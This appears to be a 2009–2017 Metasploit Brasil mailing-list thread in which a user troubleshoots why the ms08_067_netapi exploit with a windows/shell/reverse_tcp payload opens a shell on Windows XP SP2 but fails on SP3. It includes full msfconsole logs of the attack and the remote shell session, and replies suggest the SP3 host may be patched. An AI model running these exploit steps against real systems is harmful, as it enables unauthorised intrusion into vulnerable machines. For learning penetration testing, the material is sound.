Can anyone help me? Metasploit ( windows/smb/ms08_067_netapi )

bruc3

Nov 9, 2009, 10:04:09 AM
to Metasploit Brasil
-> Can anyone help me?
I am using Metasploit 3.3dev on Linux (Slackware 12.1).
Using the exploit windows/smb/ms08_067_netapi with the payload windows/shell/reverse_tcp,
I can easily get access to a machine (local network); running the payload,
I get the shell (MS-DOS). That is when it is Windows XP SP2.
When I try against a Windows XP SP3 machine, I cannot; I used the
same method.
Note that when I run $info windows/smb/ms08_067_netapi, it shows me
Windows XP SP3 Portuguese Brazil (NX); I set target 0, which is
automatic.
As you can see below, it gave an error.
So I set the target for the OS (Windows XP SP3 Portuguese BRAZIL (NX)),
which is target 53,
and it also did not establish a connection.
The firewall on both is disabled.
Can anyone tell me what is happening?
Thanks in advance.



msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set rhost 192.168.2.100
rhost => 192.168.2.100
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 0
target => 0
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Portuguese - Brazilian
[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.2.102:4444 -> 192.168.2.100:2346)

Microsoft Windows XP [versão 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ../..
cd ../..

C:\>ipconfig
ipconfig

Configuração de IP do Windows


Adaptador Ethernet Conexão local:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.100
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . : 192.168.2.254

C:\>



--------------------------------------------------------------


msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.2.101
rhost => 192.168.2.101
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 0
target => 0
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Portuguese - Brazilian
[*] Selected Target: Windows XP SP3 Portuguese - Brazilian (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >


------------------------------------------------------------------------------

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.2.101
rhost => 192.168.2.101
msf exploit(ms08_067_netapi) > set lhost 192.168.2.102
lhost => 192.168.2.102
msf exploit(ms08_067_netapi) > set target 53
target => 53
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.2.101    yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST     192.168.2.102    yes       The local address
LPORT     4444             yes       The local port


Exploit target:

Id Name
-- ----
53 Windows XP SP3 Portuguese - Brazilian (NX)


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >



WoSH

Nov 12, 2009, 6:25:47 PM
to metasplo...@googlegroups.com
Possibly it is not vulnerable. Try running a scanner
(Nessus) and check whether the host is vulnerable; it may be that you have
already applied the fix for the flaw "by accident".

Good luck.

2009/11/9 bruc3 <jogop...@gmail.com>:

Paulo Souza

May 20, 2017, 2:09:00 AM
to Metasploit Brasil
I am having the problem mentioned by BRUC3. Does anyone have the solution?

Spyman

May 20, 2017, 10:42:49 AM
to Metasploit Brasil

Take a look at this link


This one, specifically, says some things about using a VM that I don't quite agree with, but it serves as research for others.